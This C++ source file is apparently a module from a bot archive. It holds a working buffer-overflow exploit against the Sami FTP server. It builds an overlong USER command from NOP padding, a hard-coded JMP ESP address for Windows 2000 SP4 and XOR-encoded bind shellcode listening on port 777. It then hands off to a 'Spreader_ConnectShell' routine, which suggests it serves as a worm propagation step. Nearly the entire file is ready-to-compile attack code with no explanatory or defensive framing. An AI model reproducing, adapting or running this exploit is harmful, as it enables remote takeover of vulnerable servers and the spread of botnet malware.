www.pudn.com > abot.rar > sami.cpp, change:2007-05-28,size:4922b


// Two includes. 
#include <fstream.h> 
#include <winsock2.h> 
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'  
//#pragma comment(lib, "ws2_32") 
 
char MyShellCode[] =       // XOR by \x99\x99\x99\x99. 
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99" 
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777. 
                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99" 
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E" 
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA" 
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD" 
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12" 
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5" 
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93" 
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09" 
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98" 
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE" 
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10" 
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA" 
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3" 
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10" 
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD" 
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9" 
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95" 
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD" 
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12" 
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56" 
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72" 
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B" 
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99"; 
 
static char PayLoad[1329];   
 
int IP;                      
int Port;                    
int szNOP1, szNOP2;          
int Nop;  
 
// Jump ESP by library User32 on Win2000 SP4 fr.. 
char JmpESP[] = "\x0C\xED\xE3\x77"; 
// Flag ID server Sami FTP. 
char TargetFlag[] = "220-\r\n220 Features p a ."; 
char RecvBuff[200]; 
 
 
 
 
void sami(exparam_s exparam){ 
 
 
 
 
 // IP = htonl( inet_addr( exparam.ip ) ); 
 
 
  Port = 21; 
 
WSADATA wsadata; 
 
if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){ 
 
  return;} 
 
SOCKET sck; 
fd_set mask;               
struct timeval timeout; 
struct sockaddr_in server; 
 
sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP. 
 
if( sck == -1 )return; 
  
server.sin_family = AF_INET; // Address Internet 4 bytes. 
server.sin_addr.s_addr = exparam.ip; 
server.sin_port = exparam.port;//htons( Port ); // Definition port. 
// Try to connect on FTP server. 
connect( sck,( struct sockaddr *)&server, sizeof( server ) ); 
 
timeout.tv_sec = 3; // Delay 3 seconds. 
timeout.tv_usec = 0; 
FD_ZERO( &mask ); 
FD_SET( sck, &mask ); 
 
switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){ 
  case -1:{ // Problem!  
    //cout<<"[-] Select() error. Bye!"<<endl; 
    closesocket( sck ); 
	return;} 
 
  case 0:{ // Problem! 
	//cout<<"[-] Connect() error. Bye!"<<endl; 
	closesocket( sck ); 
	return;} 
 
  default:  
  if(FD_ISSET( sck, &mask ) ){ 
    recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID. 
 
    //cout<<"[+] Connected, checking the server for flag..."<<endl; 
	Sleep( 500 ); 
	 
    if ( !strstr( RecvBuff, TargetFlag ) ){ 
      //cout<<"[-] This is not a valid flag from target! Bye."<<endl; 
	  return;} // Bye! 
	//cout<<RecvBuff; 
 
    Sleep( 1000 );  
   // cout<<"[+] Connected, constructing the PayLoad..."<<endl; 
    
    szNOP1 = 219; // First padding. 
	szNOP2 = 720; // Second padding.  
    // Initialise le Buffer PayLoad NULL. 
    memset( PayLoad, NULL, sizeof( PayLoad ) ); 
    strcat( PayLoad, "USER " );     // Command User. 
    // First padding. 
    for( Nop = 0; Nop < szNOP1; Nop++ ){ 
	  strcat( PayLoad, "\x90" );} 
    // New EIP register. 
	strcat( PayLoad, JmpESP ); 
    // Second Padding. 
    for( Nop = 0; Nop < szNOP2; Nop++ ){ 
	  strcat( PayLoad, "\x90" );} 
    strcat( PayLoad, MyShellCode ); 
    strcat( PayLoad, "\x0D\x0A" ); 
    // Send fully PayLoad. 
    if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){ 
	 // cout<<"[-] Sending error, the server prolly rebooted."<<endl; 
	  return;} 
 
    Sleep( 1000 );  
 
   // cout<<"[+] Nice!!! See your log for execute an evil command."<<endl; 
   // cout<<"[+] After, try to connect on FTP server by port 777."<<endl; 
//Sleep(1000); 
Spreader_ConnectShell(exparam, 777); 
    return; 
  } 
} 
 
closesocket( sck ); 
WSACleanup(); 
return; // Bye! 
 
} 
// Fully PayLoad description (1329 Bytes) - 
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n] 
// 5        219             4      720             379         2 
 
// milw0rm.com [2006-01-31]